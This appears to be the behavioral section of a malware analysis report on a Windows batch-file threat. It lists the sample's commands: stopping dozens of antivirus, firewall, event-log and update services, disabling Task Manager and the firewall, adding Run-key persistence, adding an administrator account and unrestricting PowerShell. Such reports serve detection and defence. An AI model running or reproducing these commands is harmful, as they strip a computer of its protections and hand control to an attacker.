Technical Information
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'rundll32_9902_toolbar' = '%TEMP%\0alU5xSk.bat'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AVAADA' = '%WINDIR%\.bat'
- Windows Task Manager (Taskmgr)
- '<SYSTEM32>\net.exe' stop ""WinDefend""
- '<SYSTEM32>\net.exe' stop ""*Symantec*"" /y
- '<SYSTEM32>\net.exe' stop ""*McAfee*"" /y
- '<SYSTEM32>\net.exe' stop ccPwdSvc /y
- '<SYSTEM32>\net.exe' stop ""Serv-U"" /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Client"" /y
- '<SYSTEM32>\net.exe' stop ""Symantec AntiVirus Client"" /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Server"" /y
- '<SYSTEM32>\net.exe' stop ""NAV Alert"" /y
- '<SYSTEM32>\net.exe' stop ""Nav Auto-Protect"" /y
- '<SYSTEM32>\net.exe' stop ""McShield"" /y
- '<SYSTEM32>\net.exe' stop ""DefWatch"" /y
- '<SYSTEM32>\net.exe' stop eventlog /y
- '<SYSTEM32>\net.exe' stop InoRPC /y
- '<SYSTEM32>\net.exe' stop ""Symantec SPBBCSvc"" /y
- '<SYSTEM32>\net.exe' stop InoRT /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Corporate Edition"" /y
- '<SYSTEM32>\net.exe' stop ""ViRobot Professional Monitoring"" /y
- '<SYSTEM32>\net.exe' stop ""PC-cillin Personal Firewall"" /y
- '<SYSTEM32>\net.exe' stop ""Trend Micro Proxy Service"" /y
- '<SYSTEM32>\net.exe' stop ""Trend NT Realtime Service"" /y
- '<SYSTEM32>\net.exe' stop ""McAfee.com McShield"" /y
- '<SYSTEM32>\net.exe' stop ""McAfee.com VirusScan Online Realtime Engine"" /y
- '<SYSTEM32>\net.exe' stop ""SyGateService"" /y
- '<SYSTEM32>\net.exe' stop ""Sophos Anti-Virus"" /y
- '<SYSTEM32>\net.exe' stop ""Sophos Anti-Virus Network"" /y
- '<SYSTEM32>\net.exe' stop ""eTrust Antivirus Job Server"" /y
- '<SYSTEM32>\net.exe' stop ""eTrust Antivirus Realtime Server"" /y
- '<SYSTEM32>\net.exe' stop ""eTrust Antivirus RPC Server"" /y
- '<SYSTEM32>\net.exe' stop ERSvc /y
- '<SYSTEM32>\net.exe' stop ""*norton*"" /y
- '<SYSTEM32>\net.exe' stop helpsvc /y
- '<SYSTEM32>\net.exe' stop ""McAfeeAntiSpyware"" /y
- '<SYSTEM32>\net.exe' stop mcupdmgr.exe /y
- '<SYSTEM32>\net.exe' stop ""wuauserv""
- '<SYSTEM32>\net.exe' stop ""security center""
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\netsh.exe' firewall set opmode mode-disable
- '<SYSTEM32>\net.exe' stop ""Security Center"" /y
- '<SYSTEM32>\net.exe' stop ""Automatic Updates"" /y
- '<SYSTEM32>\net.exe' stop ""Symantec Core LC"" /y
- '<SYSTEM32>\net.exe' stop ""SAVScan"" /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Firewall Monitor Service"" /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Auto-Protect Service"" /y
- '<SYSTEM32>\net.exe' stop ""norton AntiVirus Auto Protect Service"" /y
- '<SYSTEM32>\net.exe' stop ""McAfee Spamkiller Server"" /y
- '<SYSTEM32>\net.exe' stop ""McAfee Personal Firewall Service"" /y
- '<SYSTEM32>\net.exe' stop netsvcs
- '<SYSTEM32>\net.exe' stop InoTask /y
- '<SYSTEM32>\net.exe' stop ""McAfee SecurityCenter Update Manager"" /y
- '<SYSTEM32>\net.exe' stop navapsvc /y
- '<SYSTEM32>\net.exe' stop ""Sygate Personal Firewall Pro"" /y
- '<SYSTEM32>\net.exe' stop vrmonsvc /y
- '<SYSTEM32>\net.exe' stop MonSvcNT /y
- '<SYSTEM32>\net.exe' stop SAVScan /y
- '<SYSTEM32>\net.exe' stop NProtectService /y
- '<SYSTEM32>\net.exe' stop ccSetMGR /y
- '<SYSTEM32>\net.exe' stop ccEvtMGR /y
- '<SYSTEM32>\net.exe' stop srservice /y
- '<SYSTEM32>\net.exe' stop ""Symantec Network Drivers Service"" /y
- '<SYSTEM32>\net.exe' stop ""norton Unerase Protection"" /y
- '<SYSTEM32>\net.exe' stop MskService /y
- '<SYSTEM32>\net.exe' stop MpfService /y
- '<SYSTEM32>\taskkill.exe' /f /t /im ""MSASCui.exe""
- '<SYSTEM32>\net.exe' stop ""Ahnlab Task Scheduler"" /y
- '<SYSTEM32>\net.exe' stop spoolnt
- %TEMP%\0alu5xsk.bat
- nul
- <Current directory>\%vshsa:~16
- %HOMEPATH%\documents\black.bat
- %TEMP%\0alu5xsk.bat
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\0alU5xSk.bat" "
- '<SYSTEM32>\net1.exe' stop ""McShield"" /y
- '<SYSTEM32>\net1.exe' stop ""Nav Auto-Protect"" /y
- '<SYSTEM32>\net1.exe' stop ""NAV Alert"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Server"" /y
- '<SYSTEM32>\net1.exe' stop ""Symantec AntiVirus Client"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Client"" /y
- '<SYSTEM32>\net1.exe' stop ""Serv-U"" /y
- '<SYSTEM32>\net1.exe' stop ccPwdSvc /y
- '<SYSTEM32>\net1.exe' stop ""*McAfee*"" /y
- '<SYSTEM32>\net1.exe' stop ""*Symantec*"" /y
- '<SYSTEM32>\net1.exe' stop ""*norton*"" /y
- '<SYSTEM32>\net1.exe' stop ERSvc /y
- '<SYSTEM32>\net1.exe' stop helpsvc /y
- '<SYSTEM32>\net1.exe' stop ""McAfeeAntiSpyware"" /y
- '<SYSTEM32>\net1.exe' stop mcupdmgr.exe /y
- '<SYSTEM32>\net1.exe' stop MskService /y
- '<SYSTEM32>\net1.exe' stop MpfService /y
- '<SYSTEM32>\net1.exe' stop ""DefWatch"" /y
- '<SYSTEM32>\net1.exe' stop eventlog /y
- '<SYSTEM32>\net1.exe' stop ""eTrust Antivirus RPC Server"" /y
- '<SYSTEM32>\net1.exe' stop ""eTrust Antivirus Realtime Server"" /y
- '<SYSTEM32>\net1.exe' stop ""eTrust Antivirus Job Server"" /y
- '<SYSTEM32>\net1.exe' stop ""Sophos Anti-Virus Network"" /y
- '<SYSTEM32>\net1.exe' stop ""Sophos Anti-Virus"" /y
- '<SYSTEM32>\net1.exe' stop ""SyGateService"" /y
- '<SYSTEM32>\net1.exe' stop ""McAfee.com VirusScan Online Realtime Engine"" /y
- '<SYSTEM32>\net1.exe' stop ""Trend NT Realtime Service"" /y
- '<SYSTEM32>\net1.exe' stop ""Ahnlab Task Scheduler"" /y
- '<SYSTEM32>\net1.exe' stop ""Trend Micro Proxy Service"" /y
- '<SYSTEM32>\net1.exe' stop ""PC-cillin Personal Firewall"" /y
- '<SYSTEM32>\net1.exe' stop ""ViRobot Professional Monitoring"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Corporate Edition"" /y
- '<SYSTEM32>\net1.exe' stop InoTask /y
- '<SYSTEM32>\net1.exe' stop InoRT /y
- '<SYSTEM32>\net1.exe' stop InoRPC /y
- '<SYSTEM32>\net1.exe' stop ""norton Unerase Protection"" /y
- '<SYSTEM32>\net1.exe' stop ""Symantec Network Drivers Service"" /y
- '<SYSTEM32>\net1.exe' stop srservice /y
- '<SYSTEM32>\net1.exe' stop ""security center""
- '<SYSTEM32>\net1.exe' stop ""wuauserv""
- '<SYSTEM32>\scrnsave.scr' /s
- '<SYSTEM32>\net1.exe' stop ""WinDefend""
- '<SYSTEM32>\rundll32.exe' USER32.DLL SwapMouseButton
- '<SYSTEM32>\cmd.exe' /K black.bat
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDIR%\.bat /f
- '<SYSTEM32>\reg.exe' add ""hklm\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""rundll32_9902_toolbar"" /t ""REG_SZ"" /d "%TEMP%\0alU5xSk.bat" /f
- '<SYSTEM32>\net1.exe' localgroup administrators session /ADD
- '<SYSTEM32>\net.exe' localgroup administrators session /ADD
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command ""Set-ExecutionPolicy Unrestricted""
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\attrib.exe' +h +s "%TEMP%\0alU5xSk.bat"
- '<SYSTEM32>\net1.exe' stop ""Security Center"" /y
- '<SYSTEM32>\net1.exe' stop ""Automatic Updates"" /y
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' stop ""Symantec Core LC"" /y
- '<SYSTEM32>\net1.exe' stop ccEvtMGR /y
- '<SYSTEM32>\net1.exe' stop ""SAVScan"" /y
- '<SYSTEM32>\net1.exe' stop ccSetMGR /y
- '<SYSTEM32>\net1.exe' stop NProtectService /y
- '<SYSTEM32>\net1.exe' stop SAVScan /y
- '<SYSTEM32>\net1.exe' stop MonSvcNT /y
- '<SYSTEM32>\net1.exe' stop vrmonsvc /y
- '<SYSTEM32>\net1.exe' stop ""Sygate Personal Firewall Pro"" /y
- '<SYSTEM32>\net1.exe' stop ""McAfee.com McShield"" /y
- '<SYSTEM32>\net1.exe' stop netsvcs
- '<SYSTEM32>\net1.exe' stop ""Symantec SPBBCSvc"" /y
- '<SYSTEM32>\net1.exe' stop ""McAfee SecurityCenter Update Manager"" /y
- '<SYSTEM32>\net1.exe' stop ""McAfee Personal Firewall Service"" /y
- '<SYSTEM32>\net1.exe' stop ""McAfee Spamkiller Server"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Auto Protect Service"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Auto-Protect Service"" /y
- '<SYSTEM32>\net1.exe' stop ""norton AntiVirus Firewall Monitor Service"" /y
- '<SYSTEM32>\net1.exe' stop navapsvc /y
- '<SYSTEM32>\net1.exe' stop spoolnt